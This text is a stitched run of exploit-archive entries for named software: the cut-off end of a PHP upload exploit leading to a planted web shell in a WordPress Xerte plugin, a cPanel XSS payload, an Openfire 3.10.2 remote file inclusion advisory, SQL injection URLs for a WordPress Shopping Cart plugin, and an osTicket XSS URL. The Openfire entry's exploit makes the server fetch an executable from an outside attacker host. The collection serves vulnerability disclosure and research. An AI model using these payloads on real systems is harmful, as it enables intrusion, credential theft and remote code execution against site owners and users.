1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php

source: https://www.securityfocus.com/bid/57064/info cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-RFI.txt Vendor: ================================ www.igniterealtime.org/projects/openfire www.igniterealtime.org/downloads/index.jsp Product: ================================ Openfire 3.10.2 Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Vulnerability Type: ================================= Remote File Inclusion CVE Reference: ============== N/A Vulnerability Details: ===================== In "available-plugins.jsp" there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet. On line 40: all that needs to be satisfied is the paramater is not null. boolean downloadRequested = request.getParameter("download") != null; String url = request.getParameter("url"); If the above condition check returns true, the application downloads whatever file you give it. line 54: if (downloadRequested) { // Download and install new plugin updateManager.downloadPlugin(url); // Log the event webManager.logEvent("downloaded new plugin from "+url, null); } Exploit code(s): ================ 1) download arbitrary filez e.g. http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe Our RFI will be downloaded to "openfire\plugins" directory. Disclosure Timeline: ========================================================= Vendor Notification: NA Sept 14, 2015 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] GET Vulnerable Product: [+] Openfire 3.10.2 Vulnerable Parameter(s): [+] download, url Affected Area(s): [+] Server =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

source: https://www.securityfocus.com/bid/57101/info The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1

source: https://www.securityfocus.com/bid/57101/info The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1

source: https://www.securityfocus.com/bid/57111/info osTicket is prone to multiple input-validation vulnerabilities including: 1. Multiple cross-site scripting vulnerabilities 2. An open-redirection vulnerability 3. Multiple SQL-injection vulnerabilities An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. osTicket 1.7 DPR3 is vulnerable; other versions may also be affected. http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22